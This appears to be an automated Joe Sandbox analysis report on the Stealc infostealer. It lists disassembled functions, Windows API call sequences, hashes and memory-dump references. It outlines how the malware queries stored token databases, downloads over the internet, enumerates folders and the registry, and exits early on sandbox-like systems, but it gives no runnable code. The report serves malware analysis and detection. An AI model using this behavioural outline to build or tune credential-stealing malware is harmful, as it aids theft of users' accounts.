Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 1440504306-1079375795
Opcode ID: 49d075711df703c7ba550fe0fec9d2b4a1463871b1e3a989dffe2e3e210c4ece
Instruction ID: 17a7d4a313252f82803e5d26bf2a4eb4c00ae7458316cd1b547f16f6002e15ca
Opcode Fuzzy Hash: 49d075711df703c7ba550fe0fec9d2b4a1463871b1e3a989dffe2e3e210c4ece
Instruction Fuzzy Hash: 8FB14E71D10108ABDB14FBA0DCA6EEE733CAF54304F444168F546B6492EF356E49EBA2

Function 00CA4FB0 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00CA4FCA
RtlAllocateHeap.NTDLL(00000000), ref: 00CA4FD1
InternetOpenA.WININET(00CC0DDF,00000000,00000000,00000000,00000000), ref: 00CA4FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00CA5011
InternetReadFile.WININET(00CB5EDB,?,00000400,00000000), ref: 00CA5041
memcpy.MSVCRT(00000000,?,00000001), ref: 00CA508A
InternetCloseHandle.WININET(00CB5EDB), ref: 00CA50B9
InternetCloseHandle.WININET(?), ref: 00CA50C6

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
String ID:
API String ID: 1008454911-0
Opcode ID: 3ab7efa40d48b0e725aa55da88a44472c94739850e95c6a46c7cfcee0d9b756a
Instruction ID: 561f831a754e7ff51a99fe0b19ee572d5f20f4bb33ff06050f38806474120f77
Opcode Fuzzy Hash: 3ab7efa40d48b0e725aa55da88a44472c94739850e95c6a46c7cfcee0d9b756a
Instruction Fuzzy Hash: 2831E3B4A0021CABDB20CF54DC85BDCB7B4EB48704F1081E9FA09B7281D6706AC58FA9

Function 00CB4780 Relevance: 10.6, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,007FFCB0,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00CB47DB

Part of subcall function 00CB8DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00CB8E0B

lstrcatA.KERNEL32(?,00000000), ref: 00CB4801
lstrcatA.KERNEL32(?,?), ref: 00CB4820
lstrcatA.KERNEL32(?,?), ref: 00CB4834
lstrcatA.KERNEL32(?,007FA240), ref: 00CB4847
lstrcatA.KERNEL32(?,?), ref: 00CB485B
lstrcatA.KERNEL32(?,00800CF8), ref: 00CB486F

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

Part of subcall function 00CB8D90: GetFileAttributesA.KERNEL32(00000000,?,00CB0117,?,00000000,?,00000000,00CC0DAB,00CC0DAA), ref: 00CB8D9F

Part of subcall function 00CB4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00CB4580
Part of subcall function 00CB4570: HeapAlloc.KERNEL32(00000000), ref: 00CB4587
Part of subcall function 00CB4570: wsprintfA.USER32 ref: 00CB45A6
Part of subcall function 00CB4570: FindFirstFileA.KERNEL32(?,?), ref: 00CB45BD

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 167551676-0
Opcode ID: 1d12263cca83a95d64f279e9745536a0a62711a6593e0fded9d74c25a66179be
Instruction ID: 98f7ec0328ceb8426e3edbc1334a94c582bb8ecc0d6f0c5730b12aa821340780
Opcode Fuzzy Hash: 1d12263cca83a95d64f279e9745536a0a62711a6593e0fded9d74c25a66179be
Instruction Fuzzy Hash: 553171B2D0020C6BDB14FBB0DCC6EE9737CAB58700F444599B359A6081EE74A78DDB95

Function 00CB69F0 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB9860: GetProcAddress.KERNEL32(75900000,007F3868), ref: 00CB98A1
Part of subcall function 00CB9860: GetProcAddress.KERNEL32(75900000,007F3880), ref: 00CB98BA
Part of subcall function 00CB9860: GetProcAddress.KERNEL32(75900000,007F39D0), ref: 00CB98D2
Part of subcall function 00CB9860: GetProcAddress.KERNEL32(75900000,007F39A0), ref: 00CB98EA
Part of subcall function 00CB9860: GetProcAddress.KERNEL32(75900000,007F3A18), ref: 00CB9903
Part of subcall function 00CB9860: GetProcAddress.KERNEL32(75900000,007F1328), ref: 00CB991B
Part of subcall function 00CB9860: GetProcAddress.KERNEL32(75900000,007EAE40), ref: 00CB9933
Part of subcall function 00CB9860: GetProcAddress.KERNEL32(75900000,007EAC40), ref: 00CB994C
Part of subcall function 00CB9860: GetProcAddress.KERNEL32(75900000,007F37F0), ref: 00CB9964
Part of subcall function 00CB9860: GetProcAddress.KERNEL32(75900000,007F38E0), ref: 00CB997C
Part of subcall function 00CB9860: GetProcAddress.KERNEL32(75900000,007F3988), ref: 00CB9995
Part of subcall function 00CB9860: GetProcAddress.KERNEL32(75900000,007F38B0), ref: 00CB99AD
Part of subcall function 00CB9860: GetProcAddress.KERNEL32(75900000,007EAD80), ref: 00CB99C5
Part of subcall function 00CB9860: GetProcAddress.KERNEL32(75900000,007F3940), ref: 00CB99DE

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

Part of subcall function 00CA11D0: ExitProcess.KERNEL32 ref: 00CA1211

Part of subcall function 00CA1160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00CB6A17,00CC0AEF), ref: 00CA116A
Part of subcall function 00CA1160: ExitProcess.KERNEL32 ref: 00CA117E

Part of subcall function 00CA1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00CB6A1C), ref: 00CA112B
Part of subcall function 00CA1110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00CB6A1C), ref: 00CA1132
Part of subcall function 00CA1110: ExitProcess.KERNEL32 ref: 00CA1143

Part of subcall function 00CA1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00CA123E
Part of subcall function 00CA1220: __aulldiv.LIBCMT ref: 00CA1258
Part of subcall function 00CA1220: __aulldiv.LIBCMT ref: 00CA1266
Part of subcall function 00CA1220: ExitProcess.KERNEL32 ref: 00CA1294

Part of subcall function 00CB6770: GetUserDefaultLangID.KERNEL32(?,?,00CB6A26,00CC0AEF), ref: 00CB6774

GetUserDefaultLCID.KERNEL32 ref: 00CB6A26

Part of subcall function 00CA1190: ExitProcess.KERNEL32 ref: 00CA11C6

Part of subcall function 00CB7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00CA11B7), ref: 00CB7880
Part of subcall function 00CB7850: HeapAlloc.KERNEL32(00000000,?,?,?,00CA11B7), ref: 00CB7887
Part of subcall function 00CB7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00CB789F

Part of subcall function 00CB78E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00CB6A2B), ref: 00CB7910
Part of subcall function 00CB78E0: HeapAlloc.KERNEL32(00000000,?,?,?,00CB6A2B), ref: 00CB7917
Part of subcall function 00CB78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00CB792F

Part of subcall function 00CBA9B0: lstrlenA.KERNEL32(?,00CC1110,?,00000000,00CC0AEF), ref: 00CBA9C5
Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
Part of subcall function 00CBA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00CBAA12

Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0AEF), ref: 00CBA905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,007F1348,?,00CC110C,?,00000000,?,00CC1110,?,00000000,00CC0AEF), ref: 00CB6ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CB6AE8
CloseHandle.KERNEL32(00000000), ref: 00CB6AF9
Sleep.KERNEL32(00001770), ref: 00CB6B04
CloseHandle.KERNEL32(?,00000000,?,007F1348,?,00CC110C,?,00000000,?,00CC1110,?,00000000,00CC0AEF), ref: 00CB6B1A
ExitProcess.KERNEL32 ref: 00CB6B22

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 3511611419-0
Opcode ID: e0f955d8d18a298d6cab3bc605f692fc4aaf55cfbe0194878cbe53a646b29c0e
Instruction ID: 8496e55656b0c8206f73adf5bf4f3216a7f3d4969fe64f5f9ea6c4fa50f79360
Opcode Fuzzy Hash: e0f955d8d18a298d6cab3bc605f692fc4aaf55cfbe0194878cbe53a646b29c0e
Instruction Fuzzy Hash: 3E312770D10209AADB04FBF1DC96BEE7738AF04300F544528F652A61C2EF746A05EAA2

Function 00CB83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00CB8426
wsprintfA.USER32 ref: 00CB8459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00CB847B
RegCloseKey.ADVAPI32(00000000), ref: 00CB848C
RegCloseKey.ADVAPI32(00000000), ref: 00CB8499

Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6

RegQueryValueExA.KERNEL32(00000000,00800238,00000000,000F003F,?,00000400), ref: 00CB84EC
lstrlenA.KERNEL32(?), ref: 00CB8501
RegQueryValueExA.KERNEL32(00000000,00800250,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00CC0B34), ref: 00CB8599
RegCloseKey.KERNEL32(00000000), ref: 00CB8608
RegCloseKey.ADVAPI32(00000000), ref: 00CB861A

Strings

%s\%s, xrefs: 00CB844D

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 5b4f3ac1ba7529deffd428e821f98dbc471cb510a9695f10ac05eedf2478081b
Instruction ID: 1160afa34215dced5385368b40cf7a705eff7636f380c7eab446e50f61bef6f2
Opcode Fuzzy Hash: 5b4f3ac1ba7529deffd428e821f98dbc471cb510a9695f10ac05eedf2478081b
Instruction Fuzzy Hash: AF21D6B191021CAFDB24DB54DC85FE9B7B9FB48700F0485A9B609A6180DE716A89CFA4

Function 00CA47B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000800), ref: 00CA47EA
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00CA4801
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00CA4818
lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00CA4839
InternetCrackUrlA.WININET(00000000,00000000), ref: 00CA4849

Strings

<, xrefs: 00CA47C9

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: ??2@$CrackInternetlstrlen
String ID: <
API String ID: 1683549937-4251816714
Opcode ID: 9ee104c04a9e136fa2771c330cfd0c00f0edd6c05c6aaabea09e39d69bd03ca5
Instruction ID: b53d42b9b0d427240998037a2ba2354f4210edf68d8ac6c5e44acdd1c35dd749
Opcode Fuzzy Hash: 9ee104c04a9e136fa2771c330cfd0c00f0edd6c05c6aaabea09e39d69bd03ca5
Instruction Fuzzy Hash: 72212CB1D00219ABDF14EFA4E845BDD7B74FF44320F108225F956A7290EB706A05DF91

Function 00CB7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CB76A4
HeapAlloc.KERNEL32(00000000), ref: 00CB76AB
RegOpenKeyExA.KERNEL32(80000002,007FB700,00000000,00020119,00000000), ref: 00CB76DD
RegQueryValueExA.KERNEL32(00000000,00800208,00000000,00000000,?,000000FF), ref: 00CB76FE
RegCloseKey.ADVAPI32(00000000), ref: 00CB7708

Strings

Windows 11, xrefs: 00CB76BD

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: af3a2fe39ab491d1e5fcd1bfe99a71e102a52c8e1e18beda715c7891d79c6077
Instruction ID: 0baf489d4ffdece345d8b168635007e7229952f2a94ec177e47d130797f3572e
